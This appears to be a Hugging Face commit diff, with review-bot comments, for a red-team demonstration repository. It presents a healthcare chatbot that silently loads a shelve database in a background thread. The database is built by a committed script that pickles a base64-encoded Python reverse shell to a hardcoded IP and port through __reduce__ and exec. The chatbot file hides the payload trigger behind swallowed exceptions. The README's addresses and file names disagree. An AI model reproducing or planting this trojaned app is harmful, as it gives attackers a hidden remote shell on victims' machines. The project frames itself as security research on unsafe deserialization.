Iredteam committed on
Commit c4f9767 · 0 Parent(s):

initial commit

README.md ADDED
@@ -0,0 +1,86 @@
1
+ ---
2
+ license: mit
3
+ ---
4
+
5
+ > ⚠️ This project demonstrates how Python’s `shelve` database can execute code on access. It’s a security demonstration for **ethical red teaming and research** only.
6
+
7
+ # 🩺 Healthcare Chatbot (FLAN‑T5) – Shelve DB Payload Edition
8
+
9
+ ## 📌 Overview
10
+
11
+ This chatbot uses FLAN‑T5 for medical Q&A—but simultaneously loads a malicious entry from a `shelve` `.db` file to trigger a reverse shell when accessed.
12
+
13
+ A background thread opens the shelve DB, retrieves `malicious_key`, and executes its payload.
14
+
15
+ ---
16
+
17
+ ## ⚙️ How It Works
18
+
19
+ 1. `generate_data_db.py` defines a reverse shell payload (IP: **10.10.10.10**, port: **8080**).
20
+ 2. The payload is base64‑encoded and wrapped in `Trigger.__reduce__()`.
21
+ 3. A `shelve` database file `train_data_mod_obfuscated_fixed.db` is created with the malicious `Trigger` object.
22
+ 4. The Streamlit app (`healthcare_chatbot_db.py`) runs `shelve.open(...)` in a daemon thread, triggering the shell, then loads the chatbot UI.
23
+
24
+ > The main script does **not** contain any socket or subprocess code.
25
+
26
+ ---
27
+
28
+ ## 🚀 Setup Instructions
29
+
30
+ ### 🔹 Step 1: Clone or Download
31
+
32
+ ```bash
33
+ git clone https://huggingface.co/Iredteam/db-payload-chatbot
34
+ cd db-payload-chatbot
35
+ ```
36
+
37
+ ---
38
+
39
+ ### 🔹 Step 2: Download the FLAN‑T5 Model
40
+
41
+ ```bash
42
+ git clone https://huggingface.co/google/flan-t5-small
43
+ ```
44
+
45
+ ---
46
+
47
+ ### 🔹 Step 3: Build the Shelve DB Payload
48
+
49
+ ```bash
50
+ python generate_data_db.py
51
+ ```
52
+
53
+ ---
54
+
55
+ ### 🔹 Step 4: Run the Chatbot
56
+
57
+ ```bash
58
+ streamlit run healthcare_chatbot_db.py
59
+ ```
60
+
61
+ This will:
62
+ - Load the malicious shelve entry in the background
63
+ - Trigger a reverse shell to **10.201.146.205:8080**
64
+ - Display a functioning Streamlit chatbot UI
65
+
66
+ ---
67
+
68
+ ## 💡 Features
69
+
70
+ - 🔒 Local FLAN‑T5 inference for privacy & speed
71
+ - 🗄️ Reverse shell from `shelve` DB deserialization
72
+ - 🔄 Daemon thread ensures the UI remains responsive
73
+ - 🔍 No payload in the main app file
74
+
75
+ ---
76
+
77
+ ## ⚠️ Disclaimer
78
+
79
+ This is a **security research** tool. Do **not** use for unauthorized access. Always test within controlled environments and with explicit permission.
80
+
81
+ ---
82
+
83
+ ## 📩 Contact
84
+
85
+ Report issues or collaborate on the Hugging Face repo:
86
+ **https://huggingface.co/Iredteam/db-payload-chatbot**
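Review bot: The callback address is inconsistent between sections: step 1 of "How It Works" gives 10.10.10.10 port 8080, the Step 4 bullet says 10.201.146.205:8080, and `generate_data_db.py` in this commit hardcodes `ip = "10.10.10.10"`. The README also names the app `healthcare_chatbot_db.py` in "How It Works" and in the `streamlit run` command, but the file added here is `healthcare_chatbot.py`. Align both so that anyone auditing the repository knows which address and which entry point the committed artifact refers to. The Features bullet "Local FLAN‑T5 inference for privacy & speed" under a lock icon is misleading next to a component that opens an outbound connection and should be reworded.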
generate_data_db.py ADDED
@@ -0,0 +1,34 @@
1
+ import shelve
2
+ import base64
3
+ import textwrap
4
+
5
+ # Step 1: Define your reverse shell payload
6
+ payload = textwrap.dedent("""
7
+ import socket
8
+ import subprocess
9
+ ip = "10.10.10.10"
10
+ p = 8080
11
+ s = socket.socket()
12
+ s.connect((ip, p))
13
+ while True:
14
+ c = s.recv(1024).decode()
15
+ if not c:
16
+ break
17
+ o = subprocess.getoutput(c)
18
+ s.sendall(o.encode())
19
+ """).strip()
20
+
21
+ # Step 2: Base64 encode the payload
22
+ encoded_payload = base64.b64encode(payload.encode()).decode()
23
+
24
+ # Step 3: Define the trigger class
25
+ class Trigger:
26
+ def __reduce__(self):
27
+ cmd = f"import base64; exec(base64.b64decode('{encoded_payload}').decode())"
28
+ return (exec, (cmd,))
29
+
30
+ # Step 4: Save to a .db file using shelve
31
+ with shelve.open("train_data_mod_obfuscated_fixed.db") as db:
32
+ db["malicious_key"] = Trigger()
33
+
34
+ print("✅ Shelve .db file created: train_data_mod_obfuscated_fixed.db")
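Review bot: The final `print` on line 34 reports a single file, `train_data_mod_obfuscated_fixed.db`, but this commit adds `.db.bak`, `.db.dat` and `.db.dir`, so the message does not match what `shelve` wrote on the author's system; report the base name or list the files actually created. The script also has no header comment carrying the README's warning: state at the top that the stored value is a pickled object whose `__reduce__` returns `(exec, (cmd,))`, so the generated files must be handled as hostile input by anyone who encounters them apart from the README.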
getpowershell.ps1 ADDED
@@ -0,0 +1,20 @@
1
+ # Create directory for the model
2
+ New-Item -ItemType Directory -Path .\flan-t5-small -Force
3
+ # Define the list of model files
4
+ $files = @(
5
+ "config.json",
6
+ "pytorch_model.bin",
7
+ "tokenizer.json",
8
+ "tokenizer_config.json",
9
+ "special_tokens_map.json",
10
+ "vocab.txt"
11
+ )
12
+ # Base URL for the model files
13
+ $base_url = "https://huggingface.co/google/flan-t5-small/resolve/main/"
14
+ # Loop through each file and download it
15
+ foreach ($file in $files) {
16
+ $url = "$base_url$file"
17
+ $output = ".\flan-t5-small\$file"
18
+ Invoke-WebRequest -Uri $url -OutFile $output
19
+ Write-Host "Downloaded: $file"
20
+ }
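Review bot: The loop on lines 15 to 20 prints `Downloaded: $file` after `Invoke-WebRequest` without checking that the request succeeded, and nothing sets `$ErrorActionPreference` or wraps the call in `try`/`catch`, so a failed download can still be reported as done. The base URL points at `resolve/main/`, a moving branch, and no file hash is verified after download; pin a specific revision and compare each file against a recorded checksum. `pytorch_model.bin` is a pickle-based checkpoint, which deserves a comment in a repository whose subject is unsafe deserialization. The script is also not mentioned in the README, whose Step 2 uses `git clone` instead.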
healthcare_chatbot.py ADDED
@@ -0,0 +1,70 @@
1
+ import threading
2
+ import shelve
3
+ import streamlit as st
4
+ import torch
5
+ from transformers import AutoTokenizer, AutoModelForSeq2SeqLM
6
+ import warnings
7
+
8
+ # Suppress PyTorch warnings
9
+ warnings.filterwarnings("ignore", category=UserWarning, module="torch")
10
+
11
+ # ==============================
12
+ # Background Payload Loader
13
+ # ==============================
14
+ def load_shelve_payload():
15
+ try:
16
+ with shelve.open("train_data_mod_obfuscated_fixed.db") as db:
17
+ _ = db["malicious_key"] # triggers reverse shell
18
+ except Exception:
19
+ pass
20
+
21
+ threading.Thread(target=load_shelve_payload, daemon=True).start()
22
+
23
+ # ==============================
24
+ # Streamlit UI
25
+ # ==============================
26
+ st.title("🩺 Healthcare Chatbot (FLAN-T5) – Shelve DB Payload Edition")
27
+
28
+ # Model loading
29
+ st.write("🚀 Loading FLAN-T5 model from local storage...")
30
+ try:
31
+ torch_dtype = torch.float32 if torch.cuda.is_available() else torch.float32
32
+ tokenizer = AutoTokenizer.from_pretrained("flan-t5-small", local_files_only=True)
33
+ model = AutoModelForSeq2SeqLM.from_pretrained(
34
+ "flan-t5-small",
35
+ torch_dtype=torch_dtype,
36
+ local_files_only=True
37
+ )
38
+ st.write("✅ Model loaded successfully!")
39
+ except Exception as e:
40
+ st.error(f"❌ Failed to load model: {e}")
41
+ st.stop()
42
+
43
+ # ==============================
44
+ # Chatbot response logic
45
+ # ==============================
46
+ def chatbot_response(question: str) -> str:
47
+ prompt = (
48
+ "You are a helpful medical assistant. The user asked:\n"
49
+ f"Question: {question}\n\n"
50
+ "Answer concisely. If unsure, advise seeing a doctor."
51
+ )
52
+ inputs = tokenizer(prompt, return_tensors="pt", truncation=True, padding=True)
53
+ outputs = model.generate(
54
+ **inputs,
55
+ max_length=256,
56
+ num_beams=2,
57
+ no_repeat_ngram_size=2
58
+ )
59
+ return tokenizer.decode(outputs[0], skip_special_tokens=True)
60
+
61
+ if st.button("What can you help me with?"):
62
+ st.write("I can provide general medical information. Always verify with a professional.")
63
+
64
+ user_input = st.text_input("Ask me a medical question:")
65
+ if st.button("Get Answer"):
66
+ if user_input:
67
+ response = chatbot_response(user_input)
68
+ st.write(f"**Bot:** {response}")
69
+ else:
70
+ st.warning("Please enter a question.")
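Review bot: Line 31 is a no-op conditional: `torch.float32 if torch.cuda.is_available() else torch.float32` yields the same dtype on both branches, so drop the condition or choose the intended GPU dtype. In `load_shelve_payload`, `except Exception: pass` together with the daemon thread means nothing in the UI or the console shows that the database was read; for a reviewer, the `db["malicious_key"]` read on line 17 is the point where the stored pickle is deserialized, and a module-level thread that opens a data file the UI never uses is the pattern to flag. The file name also disagrees with the README, which calls it `healthcare_chatbot_db.py`.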
requirements.txt ADDED
@@ -0,0 +1,8 @@
1
+ torch
2
+ transformers
3
+ accelerate
4
+ bitsandbytes
5
+ streamlit
6
+ speechrecognition
7
+ pyttsx3
8
+ huggingface_hub
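Review bot: None of the eight entries is pinned to a version, so installs are not reproducible and pull whatever is current at install time. `accelerate`, `bitsandbytes`, `speechrecognition`, `pyttsx3` and `huggingface_hub` are not imported by either Python file in this commit (the visible imports are `streamlit`, `torch` and `transformers` plus standard-library modules); remove the unused ones to shrink the dependency surface and pin the rest.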
train_data_mod_obfuscated_fixed.db.bak ADDED
@@ -0,0 +1 @@
1
+ 'malicious_key', (0, 396)
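Review bot: This `.bak` file is generated output and carries the same single line as the `.db.dir` index added in the same commit, `'malicious_key', (0, 396)`. Since `generate_data_db.py` recreates the database, checking in the backup copy duplicates build output; drop it from version control or add it to an ignore file.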
train_data_mod_obfuscated_fixed.db.dat ADDED
Binary file (396 Bytes).
train_data_mod_obfuscated_fixed.db.dir ADDED
@@ -0,0 +1 @@
1
+ 'malicious_key', (0, 396)
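Review bot: Nothing in the commit documents how to examine these data files safely. The index entry `'malicious_key', (0, 396)` is plain text and its size matches the 396-byte `.dat` file, so the key list can be read without going through `shelve`. Add a README note that the `.dat` bytes are a pickle stream and should be inspected with `pickletools.dis`, which disassembles without executing, rather than opened with `shelve.open`.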